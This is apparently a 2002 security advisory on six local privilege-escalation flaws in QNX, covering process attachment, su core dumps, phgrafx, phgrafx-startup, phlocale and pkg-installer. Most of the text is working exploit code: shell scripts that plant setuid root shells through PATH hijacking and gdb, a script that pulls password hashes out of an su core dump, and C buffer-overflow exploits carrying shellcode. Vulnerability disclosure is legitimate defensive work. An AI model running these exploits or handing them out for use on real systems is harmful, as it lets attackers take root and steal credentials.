Title
                                                             5/6/2002
       QNX Multiple Security Vulnerabilities (ptrace, SIGSEGV, phgrafx, phlocale)

   Summary
  QNX is a whole operating system aimed at the embedded computing market. Multiple security 
  vulnerabilities have been found in the product, all of them would allow a local attacker to gain elevated 
  privileges.

   Details
  Issue #1 process attachment
  QNX allows local users to attach to any process. This would allow a local attacker to take control over 
  system sensitive process and make them do his liking.

  Example:
  $ cat tmp.c
  main ()
  {
    printf("euid=%i\n",geteuid());
  }
  $ ls -l tmp
  -rwsr-xr-x 1 root 100 4021 May 20 13:31 tmp
  $ ./tmp
  euid=0
  So far everything is normal.
  $ gdb tmp
  GNU gdb 5.0
  Copyright 2000 Free Software Foundation, Inc.
  GDB is free software, covered by the GNU General Public License, and you are welcome to change it 
  and/or distribute copies of it under certain conditions.
  Type "show copying" to see the conditions.
  There is absolutely no warranty for GDB. Type "show warranty" for details.
  This GDB was configured as "--host=x86-pc-nto-qnx --target=ntox86"...
  (no debugging symbols found)...
  (gdb) r
  Starting program: /tmp/tmp
  (gdb) c
  Continuing.
  euid=0

  Program exited normally.
  (gdb)

  Not quite the result you would expect.

  Exploit:
  #!/bin/sh

  #include <std_shouts.h>
  #include <std_disclaimer.h>
  #http://www.badc0ded.com 

  echo "#!/bin/sh" > /tmp/runme
  echo cp /bin/sh /tmp/sh > /tmp/runme
  echo chmod 4755 /tmp/sh >> /tmp/runme
  chmod 755 /tmp/runme
  echo r root -c /tmp/runme > /tmp/badc0ded
  echo break *main+44 >> /tmp/badc0ded
  echo c >> /tmp/badc0ded
  echo "call setuid(0)" >> /tmp/badc0ded
  echo c >> /tmp/badc0ded
  gdb /bin/su < badc0ded > /dev/null
  echo "www.badc0ded.com"
  sleep 1
  rm /tmp/runme /tmp/badc0ded
  /tmp/sh

  Issue #2 /bin/su Incorrect Behavior
  /bin/su accepts SIGSEGV and dumps world readable core.

  Exploit:
  #!/bin/sh
  #include <std_shouts.h>
  #include <std_disclaimer.h>
  # www.badc0ded.com <= we are in the .dot core, really :) 

  # If everything works you should get a "copy" of /etc/shadow 
  # in /tmp called mypasswd. 

  su > /dev/null &
  kill -SEGV `ps -A | grep su | awk {'print $1'}`
  strings /var/dumps/su.core | grep ":0:0" > /tmp/mypasswd

  Issue #3 phgrafx Security Issue
  phgrafx executes crttrap with system() without first dropping its euid. This would allow an attacker to 
  gain root privileges.

  Exploit:
  #!/bin/sh
  #
  # click advanced,done, apply, accept and done. 
  # now you should have a setuid root shell waiting in /tmp/badc0ded
  #
  # www.badc0ded.com
  echo "#!/bin/sh" > /tmp/crttrap
  echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap
  echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap
  echo "/usr/bin/crttrap \$1 \$2 \$3 \$4 \$5 \$6 \$7 \$8 \$9 " >> /tmp/crttrap
  chmod 755 /tmp/crttrap
  export PATH="/tmp:$PATH"
  /usr/photon/bin/phgrafx

  Issue #4 phgrafx-startup
  This vulnerability is very similar to the one mentioned before.

  Exploit:
  #!/bin/sh
  #
  # click test,restore,continue 
  # now you should have a setuid root shell waiting in /tmp/badc0ded
  #
  # www.badc0ded.com
  echo "#!/bin/sh" > /tmp/crttrap
  echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap
  echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap
  echo "/usr/bin/crttrap \$1 \$2 \$3 \$4 \$5 \$6 \$7 \$8 \$9 " >> /tmp/crttrap
  chmod 755 /tmp/crttrap
  export PATH="/tmp:$PATH"
  /usr/photon/bin/phgrafx-startup

  Issue #5 phlocale Buffer Overflow
  The phlocale has been found to contain a buffer overflow in its $ABLANG environment variable. 

  Exploit:
  /* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell. 
   * If it doesnt work for you, then you most likely need to change
   * the address to system() and/or the ret.
   * 
   * www.badc0ded.com 
  */

  main ()
  { 
     char s[]="\xeb\x0e\x31\xc0\x5b"
              "\x88\x43\x2\x53\xbb"
              "\x80\x95\x04\x08" //system() address
              "\xff\xd3\xe8\xed\xff"
              "\xff\xff\x73\x68";
     char payload[1000];
     memset (payload,0x90,sizeof(payload));
     sprintf(payload+971,"%s%s",s,"\x78\x7b\x04\x08");
     setenv("ABLANG",payload);
     execlp("/usr/photon/bin/phlocale","phlocale",0);
  }

  Issue #6 pkg-installer.c Buffer Overflow
  The pkg-installer contains a locally exploitable buffer overflow in its -u argument

  Exploit:
  /* Quick and dirty QNX pkg-installer root exploit.
   * The shellcode sucks, it is longer than it has
   * to be and you need the address to system() for 
   * it to work. Yes I know I'm lazy....
   * 
   * http://www.badc0ded.com 
  */

  main(int argc, char **argv)
  {
     int ret=0x804786d;
     char *pret;
     char s[]="\xeb\x0e\x31\xc0\x5b"
              "\x88\x43\x2\x53\xbb"
              "\xe4\xb4\x04\x08" //system() address
              "\xff\xd3\xe8\xed\xff"
        "\xff\xff\x73\x68";
     char payload[2000];
     if (argc>=2)
        ret=ret-atoi(argv[1]);
     pret=&ret;
     printf("using ret %x\n",ret);
     memset(payload,0x90,1254);
     sprintf(payload+1254,"%s%s",s,pret);
     execlp("/usr/photon/bin/pkg-installer","pkg-installer","-u",payload,0);
  }